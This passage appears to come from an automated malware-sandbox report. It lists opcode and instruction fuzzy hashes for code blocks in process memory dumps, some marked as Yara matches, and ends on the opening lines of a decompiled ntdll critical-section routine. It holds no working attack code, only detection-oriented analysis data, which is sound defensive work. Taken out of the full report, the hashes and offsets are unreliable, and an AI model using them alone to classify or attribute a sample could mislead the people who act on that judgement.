                                                                      • Instruction ID: e78c7ef493cb5301d8da0f42e7c2c5babae6a09e019d2974280dbcfa34a90b61
                                                                      • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                      • Instruction Fuzzy Hash: DEE0C231292649BBDB226F84CC01FA97B16DB507A5F104031FE085A6D0C671AC91DAC4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 53226fb55698d06e86ceadc51a859357328326cff4e3e796d768c98a5215eaa2
                                                                      • Instruction ID: 8a207909434e1c9a0c84c7a6fcc233f324effc87f927d4152b336924ea8ae2b8
                                                                      • Opcode Fuzzy Hash: 53226fb55698d06e86ceadc51a859357328326cff4e3e796d768c98a5215eaa2
                                                                      • Instruction Fuzzy Hash: 61D02B611311401EC72E13409C18B623216F7A8B50F340B0CF3030F7D2EA6088D88148
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c3496cbebd934d5370c99cd1375bc924388e5f3686c4d54fe4f6316bdb2ad988
                                                                      • Instruction ID: c18b9473796d327869cce5b39fbfce86c4e5419ab7f0a0179cb362388b52d29d
                                                                      • Opcode Fuzzy Hash: c3496cbebd934d5370c99cd1375bc924388e5f3686c4d54fe4f6316bdb2ad988
                                                                      • Instruction Fuzzy Hash: D4D0A7311201429AEF2E5B189C04B152651EB90B95F38015CF307499D2CFA0CDB2E048
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                      • Instruction ID: 0e0fbf64d58d0cc2fcd6ac9da03e987990d048425bb3c0700e9e879656082206
                                                                      • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                      • Instruction Fuzzy Hash: 40E08C31950A81ABCF16DB88C694F4EBBF5FB44B00F180008A6085B661C734AC00CB40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                      • Instruction ID: 9ac01e45a71f5f6d55f5b512b2479274d7451f736409cd674e9b6828e0095433
                                                                      • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                      • Instruction Fuzzy Hash: 9CD0E975352E81CFD61BCB5DD558B1577A4FB44B44FC504A0E641CB762E72CD954CA00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                      • Instruction ID: ec044dfa19f308e81d31c7e20897abfae8ae9b9579abc04da56086e967de5b8a
                                                                      • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                      • Instruction Fuzzy Hash: F7D0A7714715829DDB03EB54E1287E83FB1BB08208F5812558101054F3C3374909C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 070f20219413109c384b9abde22c98eb31b2ac92d07fe4d73c70997d2dc3ea92
                                                                      • Instruction ID: 8743665f1a7740f0106a630f60c6e3c2364c3868883e35260c038d74b0be82b1
                                                                      • Opcode Fuzzy Hash: 070f20219413109c384b9abde22c98eb31b2ac92d07fe4d73c70997d2dc3ea92
                                                                      • Instruction Fuzzy Hash: D4A00217F5A0544D59145C5978411B8E3A5D1A7175E1433A7DD1CB35005457C415019D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                      • Instruction ID: 7e1e0f77dd490d6c6868f6639e240f9377cad6f969df8ca1347bf75b1d42aa56
                                                                      • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                      • Instruction Fuzzy Hash: 31C08C30280A41AAEF2A1F20CD01B013AA0BB11B09F8400A06300DA4F0DB78E901E600
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                      • Instruction ID: 12d7e04f0722f11908b7b96f106b05b772f22bd5fd4de2f71a96fbd4b25c56a6
                                                                      • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                      • Instruction Fuzzy Hash: F2C08C33080648BBCF126F81CC00F467F2AFBA4B60F008014FA080B571C632E970EB84
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                      • Instruction ID: 59d2bd086d8c217e09811603541e9b23f262b9574d138d758b24347061a89c96
                                                                      • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                      • Instruction Fuzzy Hash: 17C04C32180648BBCB166E45DD01F167B69E7A4B60F154025B7040A9618676ED61D598
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                      • Instruction ID: b943546ac10729e93182f9661f7f36c475d4ab902145b14174fad5497f33109a
                                                                      • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                      • Instruction Fuzzy Hash: A3C08C32080648BBC7126A45CD00F017B29E7A0B60F000020F6040A6A18A32E861D588
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                      • Instruction ID: bb0591448a2e1b7f34f46d2eda310ba8813ef1d5e7626de5105b981a543df0f7
                                                                      • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                      • Instruction Fuzzy Hash: F8C02B70160440FFDB1A5F30CD00F157294F710B31F6403587320458F0D628DC00D104
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                      • Instruction ID: de9a6eaccb21daa0b5cf568e069e0d0235b066ff814dd31c1316a3d05ee17c66
                                                                      • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                      • Instruction Fuzzy Hash: 85C08C701519805AFB2E5B4CCE28B203A90AB0C60CF88029CEB01094E2C368B843CA88
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ae19e5f2467e20c4ef9b8d5b078c845dea6195b039c69cc537f41d36c93fa74b
                                                                      • Instruction ID: 493a20fe309d9ce298015384523d7c71795875851bdd388aede43c5e1d704f98
                                                                      • Opcode Fuzzy Hash: ae19e5f2467e20c4ef9b8d5b078c845dea6195b039c69cc537f41d36c93fa74b
                                                                      • Instruction Fuzzy Hash: 2E900277F4A1140454141C8978400B4D334D0C30BAC103273D60DB35000006C415025C
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                      • Instruction ID: d6807c5e17c7079aa7c2a1862c6a70ce5b5c2bfe6380166e455e4722d722a238
                                                                      • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                      • Instruction Fuzzy Hash: D9B092353019408FCE1ADF18C180B1933E4BB84A40B8400D4E400CBA61D329E8008900
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                      • Instruction ID: e2f80d0273fee866b6e4ac0c0cf4d14080086192a33cca47b6aeb2c0984b7d38
                                                                      • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                      • Instruction Fuzzy Hash: 65B01232C51841CFCF06EF80C610B197371FB00750F094490900127930C328AC01CB40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 45cab3b568d8f1b4cfdace3ebd0c2d871993ab27fa20ce60fe812606e20f6410
                                                                      • Instruction ID: f7ce651dab1ecee7c47963cb682675054d4f1f57cc3c6cf650f6ab5e91802ca0
                                                                      • Opcode Fuzzy Hash: 45cab3b568d8f1b4cfdace3ebd0c2d871993ab27fa20ce60fe812606e20f6410
                                                                      • Instruction Fuzzy Hash: 319002B121141813D14065A9480460B0005A7D0352F61C011E6054655ECA698C517275
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 59c8e419eaca7b386cbe91ccccc4ce0b65525d125120f0cf2f5a686ca6ce43fc
                                                                      • Instruction ID: 72cd7f10b377cc5463922ba30dd580152eb55e4dcd1ae77294b319ff1f3992dd
                                                                      • Opcode Fuzzy Hash: 59c8e419eaca7b386cbe91ccccc4ce0b65525d125120f0cf2f5a686ca6ce43fc
                                                                      • Instruction Fuzzy Hash: 629002B122101452D10461A9440470A0045A7E1251F61C012E6144654CC5698C616265
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a3cce696a587826a1076c2923005e6d8bae1cccebc10d9b24fe2133b759cacb5
                                                                      • Instruction ID: a8f990eb0f698ac063a88d70d0d96691b5636e03c8add5643ffb60d00ee662b9
                                                                      • Opcode Fuzzy Hash: a3cce696a587826a1076c2923005e6d8bae1cccebc10d9b24fe2133b759cacb5
                                                                      • Instruction Fuzzy Hash: C690027125101812D14171A9440460A0009B7D0291FA1C012E4414654EC6958A56BBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bbde56ffd9dd80f7857cd83208128edbe8aad557370a858a2041987e448ce74c
                                                                      • Instruction ID: 217d9ba939082e3991839c1562e6d5e4a8b02505e4451af24987d99fc4ff080d
                                                                      • Opcode Fuzzy Hash: bbde56ffd9dd80f7857cd83208128edbe8aad557370a858a2041987e448ce74c
                                                                      • Instruction Fuzzy Hash: EB9002B1611154534540B1A9480440A5015B7E13513A1C121E4444660CC6A88855A3A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 64a005abbb0f8d56783c3916d5f2a85e854c3d341d66c12d9e306ee136d10f30
                                                                      • Instruction ID: e059cf89a2cf01b051e81bbcc9c3a23ca09d1604131c6855c2e0657cc83177bb
                                                                      • Opcode Fuzzy Hash: 64a005abbb0f8d56783c3916d5f2a85e854c3d341d66c12d9e306ee136d10f30
                                                                      • Instruction Fuzzy Hash: C290027131101812D10261A9441460A0009E7D1395FA1C012E5414655DC6658953B272
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 473252430a4b4e3b8aeea9c44c2eebf07df6478e45a6ac2d1ddd7accb1010b53
                                                                      • Instruction ID: 8f0a51a4722a04918a440917ffb7ab99fa7ba5e6d6d84c38ae9a6bc868aa0f7e
                                                                      • Opcode Fuzzy Hash: 473252430a4b4e3b8aeea9c44c2eebf07df6478e45a6ac2d1ddd7accb1010b53
                                                                      • Instruction Fuzzy Hash: B590027125101C12D14071A9841470B0006E7D0651F61C011E4014654DC656896577F1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6183904e10759eeccfb9c21fb44fce08d6976460a7b2d7e295a15897995e15c7
                                                                      • Instruction ID: 7f5bb314e06d62d5310ea7e0747ea4f3188d14626a1c3a94f0687f8192d5b0c8
                                                                      • Opcode Fuzzy Hash: 6183904e10759eeccfb9c21fb44fce08d6976460a7b2d7e295a15897995e15c7
                                                                      • Instruction Fuzzy Hash: 1990027121145412D14071A9844460F5005B7E0351F61C411E4415654CC6558856A361
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 14e4ea3baa8ed8ff023bac1c9a12bfda2cadf3b9695602c71fbf23aa97741acd
                                                                      • Instruction ID: 46164607375f1769c22da73db022c74bb87f70d6ee8d4b466b51c58df50e3aef
                                                                      • Opcode Fuzzy Hash: 14e4ea3baa8ed8ff023bac1c9a12bfda2cadf3b9695602c71fbf23aa97741acd
                                                                      • Instruction Fuzzy Hash: 9B90027121141812D10061A9480874B0005A7D0352F61C011E9154655EC6A5C8917671
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0a9adff0b7a3e4e5c2a942ac529ace854cb26118e250ebc9bee9feba32255b38
                                                                      • Instruction ID: 76009b85e85811a1e4cd6f5b319793224b028cbbe3978b51ad92ec2330cf8e3b
                                                                      • Opcode Fuzzy Hash: 0a9adff0b7a3e4e5c2a942ac529ace854cb26118e250ebc9bee9feba32255b38
                                                                      • Instruction Fuzzy Hash: 5F90027121145852D14062A94804B0F4105A7E1252FA1C019E8146654CC95588556761
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6ba3aeefc971cf65bd6512fc7007ca35d66002ddf44667af0da07cb4c47bba11
                                                                      • Instruction ID: 454d735127f0e3e4e595f2b3edf6e0adb9f894e13492d6db1bd04a8fb571a3e7
                                                                      • Opcode Fuzzy Hash: 6ba3aeefc971cf65bd6512fc7007ca35d66002ddf44667af0da07cb4c47bba11
                                                                      • Instruction Fuzzy Hash: E49002F1211154A24500A2A98404B0E4505A7E0251B61C016E5044660CC5658851A275
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 758714533d67ef4b6a26c7840f278b189fa83366645151e6862f6a76e903cd11
                                                                      • Instruction ID: beab7bc92b35d93ae790d632155793826c8ec91eec65634ba1306872eea5458c
                                                                      • Opcode Fuzzy Hash: 758714533d67ef4b6a26c7840f278b189fa83366645151e6862f6a76e903cd11
                                                                      • Instruction Fuzzy Hash: 0F900271A1501422914071A9481464A4006B7E0791B65C011E4504654CC9948A5563E1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0ef1f823aad7c7236f456155639fdc477a46ecc0fbca5a62d2c33e02e4146075
                                                                      • Instruction ID: fb6a988c95a7de4d0d7ec3a261aa2af2f0bc77bd9623d3396d0936e43a25a86f
                                                                      • Opcode Fuzzy Hash: 0ef1f823aad7c7236f456155639fdc477a46ecc0fbca5a62d2c33e02e4146075
                                                                      • Instruction Fuzzy Hash: 74900275231014120145A5A9060450F0445B7D63A13A1C015F5406690CC66188656361
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5252475bd88deaf3d394365ee693749dcffa8a5a6c018eacd81e2aff4c88e286
                                                                      • Instruction ID: ec746b45308f4883e0ea3dfca8fc4f678c917d1824e62c63ddf573812ff1b9bf
                                                                      • Opcode Fuzzy Hash: 5252475bd88deaf3d394365ee693749dcffa8a5a6c018eacd81e2aff4c88e286
                                                                      • Instruction Fuzzy Hash: D690027121101C12D10461A9480468A0005A7D0351F61C011EA014755ED6A588917271
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d0276e0ab1614463bcd172dbb2d881ddf62b258caf61db2fd5032cbb14a4c8f7
                                                                      • Instruction ID: 9cda50db22986ff51139cc2f3fcdc7dc76e22427fb2c070f00f8f532edd48f90
                                                                      • Opcode Fuzzy Hash: d0276e0ab1614463bcd172dbb2d881ddf62b258caf61db2fd5032cbb14a4c8f7
                                                                      • Instruction Fuzzy Hash: 0590027161501812D14071A9541870A0015A7D0251F61D011E4014654DC6998A5577E1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9e5b62b7e2f1e9a1ccfa87471279ecaa735904c17a3a972126d23acad42a055c
                                                                      • Instruction ID: cf1f820404b0de13c61cbc7572037a346205fdce03a8c4871e425718f3ba003b
                                                                      • Opcode Fuzzy Hash: 9e5b62b7e2f1e9a1ccfa87471279ecaa735904c17a3a972126d23acad42a055c
                                                                      • Instruction Fuzzy Hash: 21900271311014629500A6E95804A4E4105A7F0351B61D015E8004654CC59488616261
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 63c1e62c08f8d6650eb9cb9c01333d3ec0abfa29723193d5c159d9c7340d2e1a
                                                                      • Instruction ID: 3b2311e6bcd8119c73402ae3f1081e51bc939edc403e599edb7bdc84b41f4d9b
                                                                      • Opcode Fuzzy Hash: 63c1e62c08f8d6650eb9cb9c01333d3ec0abfa29723193d5c159d9c7340d2e1a
                                                                      • Instruction Fuzzy Hash: C390027121101813D10061A9550870B0005A7D0251F61D411E4414658DD69688517261
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 989b3ed85cef2d72cec316f7b0354ec2bac0e978cd187fa50fd004fbe99a07a7
                                                                      • Instruction ID: ec29189b91d300399c94033860a1a922a50426bd77c7b55e07697d2c07c969d2
                                                                      • Opcode Fuzzy Hash: 989b3ed85cef2d72cec316f7b0354ec2bac0e978cd187fa50fd004fbe99a07a7
                                                                      • Instruction Fuzzy Hash: D290027521505852D50065A95804A8B0005A7D0355F61D411E441469CDC6948861B261
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b248b28557400ed940cea23bc04d051c37ab3c185475e9b0317e1a78d0a622f4
                                                                      • Instruction ID: 22e7a33cb1e0d28eb40ffca78802ab8e864bda79d71635635118e1e84bfe08fe
                                                                      • Opcode Fuzzy Hash: b248b28557400ed940cea23bc04d051c37ab3c185475e9b0317e1a78d0a622f4
                                                                      • Instruction Fuzzy Hash: 3D90027121505852D10065A95408A0A0005A7D0255F61D011E5054695DC6758851B271
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 51e338e46e30a7df350a4ee25235f0e1551a1c96f1920125aad920f231464b12
                                                                      • Instruction ID: 244c7846693aa7acdda54d1c175a45b42034022fd243e00777e914a0081b1df8
                                                                      • Opcode Fuzzy Hash: 51e338e46e30a7df350a4ee25235f0e1551a1c96f1920125aad920f231464b12
                                                                      • Instruction Fuzzy Hash: 3890027161501C12D15071A9441474A0005A7D0351F61C011E4014754DC7958A5577E1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 66fdf6520275e9a9b04bcaee81dfdda558b9e829da894a40daa76db17c55b042
                                                                      • Instruction ID: 50181d95aee91021f7acad4227e1322f176ccd3d6fc0aa95c474c623de5e7760
                                                                      • Opcode Fuzzy Hash: 66fdf6520275e9a9b04bcaee81dfdda558b9e829da894a40daa76db17c55b042
                                                                      • Instruction Fuzzy Hash: EA90027121505C52D14071A94404A4A0015A7D0355F61C011E4054794DD6658D55B7A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b6ee193e3edac5c6ccd318dc2da28b26e50d36223db05c8e749cc59766be2e90
                                                                      • Instruction ID: 6cedc36d2c27a355ebbcc694f4aa9df9f4f11f0e7834acdde7ac30c911d9c91b
                                                                      • Opcode Fuzzy Hash: b6ee193e3edac5c6ccd318dc2da28b26e50d36223db05c8e749cc59766be2e90
                                                                      • Instruction Fuzzy Hash: F490027121101C52D10061A94404B4A0005A7E0351F61C016E4114754DC655C8517661
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                      • Instruction ID: bdd331c4a0511885c8859a0de7f8e819a7751a551c47572a880c971471788206
                                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                      • Instruction Fuzzy Hash:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

C-Code - Quality: 53%
			/* Decompiler output: ntdll critical-section wait-timeout diagnostic (comments added; helper names E0121CE00 and E01265720 are the report's own labels) */
			E0126FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;                          /* __edx points at the 64-bit wait timeout (low dword, high dword) */
				_push(_a4);
				_t14 =  *[fs:0x18];                    /* TEB self pointer; TEB+0x20 / +0x24 hold ClientId.UniqueProcess / UniqueThread */
